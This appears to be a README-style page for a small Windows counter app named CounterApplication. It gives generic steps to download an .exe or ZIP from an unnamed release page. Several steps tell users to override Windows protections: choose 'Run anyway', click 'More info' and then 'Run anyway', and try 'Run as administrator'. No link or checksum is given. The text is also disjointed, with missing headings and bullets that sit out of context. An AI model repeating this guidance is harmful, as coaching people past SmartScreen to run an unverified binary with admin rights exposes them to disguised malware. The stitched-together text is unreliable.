To get the app, visit this page to download:
Open the page, look for the latest release, and download the Windows file from there.
- Open the download page in your browser.
- Find the newest release at the top of the page.
- Under the release files, choose the Windows file.
- If you see a
.zipfile, download it and extract it first. - If you see an
.exefile, download it and open it. - If Windows asks for permission, choose Yes or Run anyway.
- Follow the on-screen steps to start the app.
CounterApplication is a small Windows app for simple counting tasks. It helps you track numbers without extra setup. You can use it for:
- Counting items
- Tracking clicks

- Resetting counts when needed

Use this app on a Windows PC with:
- Windows 10 or Windows 11
- At least 2 GB of RAM
- Basic internet access for the download
- Enough disk space for the app and its files

- Download the ZIP file from the release page.
- Open your Downloads folder.
- Right-click the ZIP file.
- Choose Extract All.
- Open the new folder.

When you open CounterApplication for the first time, you may see a simple counter screen. Use the main controls to manage your count.

- Keep counting without leaving the app
Press the main increase button to add to the total.
Press the decrease button to lower the total.
Use the reset button when you want to start over.

- If the app does not open, try extracting the ZIP file again.

Open your Downloads folder in File Explorer.
No extra steps should be needed for a standard Windows release file.
Choose the Windows file from the latest release on the download page. If there is more than one file, pick the one that ends in .exe for the easiest start.

- Save the file to your computer.
- Open it from your Downloads folder.
- Keep the file name the same after download.

- Support files needed by the app
- Try right-clicking the file and choosing Run as administrator
- Make sure the file finished downloading
- If it is a ZIP file, extract it first
- Click More info
- Then choose Run anyway if you trust the source and want to open the app
- Download the file again
- Use the newest release
- Make sure no files were removed during extraction
